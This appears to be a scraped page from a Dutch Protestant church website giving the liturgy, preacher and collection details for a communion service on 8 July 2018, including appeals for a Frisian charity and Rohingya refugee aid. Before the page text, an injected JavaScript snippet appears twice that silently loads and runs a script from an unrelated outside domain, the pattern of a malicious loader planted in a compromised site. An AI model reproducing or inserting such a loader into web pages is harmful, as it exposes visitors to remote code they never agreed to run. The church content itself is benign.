;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 8 juli 2018 9:30 uur - PKN Damwâld
zondag 8 juli 2018
09:30 uur

Kerkdienst zondag 8 juli 2018 9:30 uur

Thema: Viering Heilig Avondmaal

Informatie

Voorganger:Ds. G.J. Otter
Thema:Viering Heilig Avondmaal
Liturgie
Lied voor de dienst Gez.457:1 en 4
Welkom
We zingen: Ps.147:1 en 4
Stilgebed, Votum en groet
We zingen: Gez.358:1 en 4
Geloofsbelijdenis .
We zingen: Opw.785
Gebed
We lezen: 1 Joh.2:28 - 3,17
Collecte
We zingen: Ps.103:1 en 5
Preek .
We zingen: Ps.116: 1 en 6
Formulier
Avondmaal
Gebed
We zingen: Gez. 481:1 en 2
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Stichting Fryslân 58

De (stille) armoede in Nederland neemt snel toe. Naast ouderen, allochtonen en alleenstaande ouders kunnen ook steeds minder zelfstandige ondernemers de eindjes aan elkaar knopen. Juist nu het economisch slechter gaat en de sociale zekerheid steeds verder wordt uitgekleed, is het nu het moment om de krachten te bundelen en ons sterk te maken voor het terugdringen van armoede en sociale uitsluiting in onze eigen samenleving. Stichting Fryslân58 wil hier een bijdrage aan leveren door het verstrekken van huisraad, kleding en speelgoed aan mensen die dit zelf (tijdelijk) niet meer kunnen betalen. Stichting Fryslân58 stelt de goederen, tegen een geringe vergoeding, ter beschikking. Tevens voorkomen wij hiermee verspilling van goederen door die te hergebruiken. Wij kunnen echter alleen maar aanbieden wat we van u hebben ontvangen en vragen uw hulp voor deze doelgroep.

Tweede collecte: Kerk
Uitganscollecte: Avondmaalscollecte

Hulp aan Rohingya-vluchtelingen - Bangladesh
Er zijn naar schatting meer dan 1 miljoen Rohingya vluchtelingen in Bangladesh. Ze zijn gevlucht uit angst voor het gewelddadige Myanmarese leger. Ruim 70 procent van de vluchtelingen zijn kinderen, onder wie veel pasgeboren baby's. Ook zijn er veel zwangere en dus kwetsbare vrouwen. Nog altijd komen er dagelijks grote aantallen vluchtelingen per boot of te voet aan in vluchtelingenkamp Cox's Bazar. Wij komen daarom in actie. De vraag naar voedsel, onderdak, water en elementaire hygiëne is groot. Als gezinnen niet aan hun basisbehoeften kunnen voldoen, zal het lijden nog erger worden. Meer dan 36.000 pasgeboren kinderen zijn het meest kwetsbaar. Ze leven in omstandigheden waarin grote kans is op de verspreiding van ziekten. In Bangladesh hebben Kerk in Actie en ICCO toegang tot de vluchtelingen in Cox's Bazar via lokale partnerorganisaties. Er is hulp beschikbaar gesteld voor voedselpakketten, hygiënepakketten en handwasfaciliteiten voor in totaal 1500 families. Alleenstaande vrouwen, oude en gehandicapte mensen krijgen de voorkeur.